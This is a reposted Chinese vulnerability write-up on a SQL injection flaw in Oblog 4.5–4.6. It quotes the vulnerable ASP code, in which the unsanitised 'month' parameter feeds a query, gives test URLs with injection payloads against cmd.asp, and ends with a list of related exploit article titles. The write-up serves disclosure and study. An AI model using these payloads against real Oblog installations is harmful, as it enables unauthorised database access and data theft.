Oblog最新注入漏洞分析
来源:互联网 发布:ppt 数据计算展示图 编辑:程序博客网 时间:2024/06/15 05:43
Date:2008-5-15 Author:Yamato[BCT] Version:Oblog 4.5-4.6 sql 代码分析: 文件In/Class_UserCommand.asp : strMonth=Request("month") //第63行 strDay=Request("day") …… Case "month" //第84行 Dim LastDay G_P_FileName = G_P_FileName & "month&month=" & strMonth strDay=Left(strMonth,4) & "-" & Right(strMonth,2) & "-01" mYear=Left(strMonth,4) mMonth=Right(strMonth,2) If InStr ("01,03,05,07,08,10,12",mMonth)> 0 Then LastDay = "31"…… Else //第109行 SqlPart = " And Addtime >=’"&strMonth&"01’ AND Addtime < ’"&strMonth&LastDay&"’ " 构造合适的变量strMonth进行注射 测试方法: http://localhost/oblog/cmd.asp?do= month&month=2008’ and user>0--01 strDay变量从month中获得日期数据,并判断strDay是否为日期数据。所以构造的注射语句为: http://localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)--01 执行sql语句采用rst.Open strSql,Conn,1,1 不能修改记录集
- Oblog最新注入漏洞分析
- Oblog 2.52导出日志最新漏洞
- ESPCMS最新cookie注入漏洞分析
- dedecms最新注入漏洞
- emseasy最新注入漏洞
- Oblog博客系统存在SQL注入漏洞http://www.anqn.com
- 最新易想团购系统通杀SQL注入漏洞分析附利用exp
- 风迅最新注入漏洞(转)
- ThinkPHP最新版本SQL注入漏洞
- 最新设备管理器漏洞分析
- [漏洞分析] PHPCollab 2.5 SQL注入漏洞
- joomla对象注入漏洞分析
- 【漏洞分析】WordPress REST API 内容注入漏洞分析
- 最新IE远程代码执行漏洞分析
- 南方数据编辑器southidceditor最新注入0day漏洞
- phparticle 2.0注入漏洞测试分析
- phparticle 2.0注入漏洞分析解决办法
- SQLSERVER注入式漏洞攻击分析
- Embed Object大部分的属性及参数详解
- 开篇
- WordPress 2.6.1 SQL Column Truncation Vulnerability分析
- 各种数据库连接
- Google的博客blogspot.com窃取cookie漏洞
- Oblog最新注入漏洞分析
- Discuz!!论坛wap功能模块编码的注射漏洞分析
- 对Extmail安全漏洞的分析
- 暴风影音视频加速程序模块缓冲区溢出漏洞的分析
- 配置eclipse的艰难路程
- C/C++中字符指针数组及指向指针的指针的含义
- Z-blog跨站脚本攻击漏洞
- 中文编程编码说明
- RedHat.Enterprise.Linux.5 VMtools 安装